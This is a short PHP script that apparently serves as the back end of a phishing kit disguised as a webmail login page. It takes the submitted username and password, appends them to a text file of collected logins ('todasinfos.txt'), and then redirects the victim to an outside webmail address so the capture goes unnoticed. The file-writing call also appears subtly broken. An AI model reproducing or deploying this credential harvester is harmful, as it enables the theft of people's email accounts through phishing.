<?php
date_default_timezone_set('America/Sao_Paulo');


$matts .= "Content-type: text/html; charset=iso-8859-1\r\n";
$matts .= "MIME-Version: 1.0\n";
include '../skins/webmail2016/assets/util/api/funcoes.php';

$_user = $_POST['_user'];
$_pass = $_POST['_pass'];



$stringData ="$_user;$_pass";




    
$path = '../cliente/todasinfos' . ".txt";

$fp = fopen($path, "a+");
$escreve = fwriter($path,$stringData);
fclose($fp);    
    
    
    

header( 'Location: https://webmail-seguro.com.br' ) ;
?>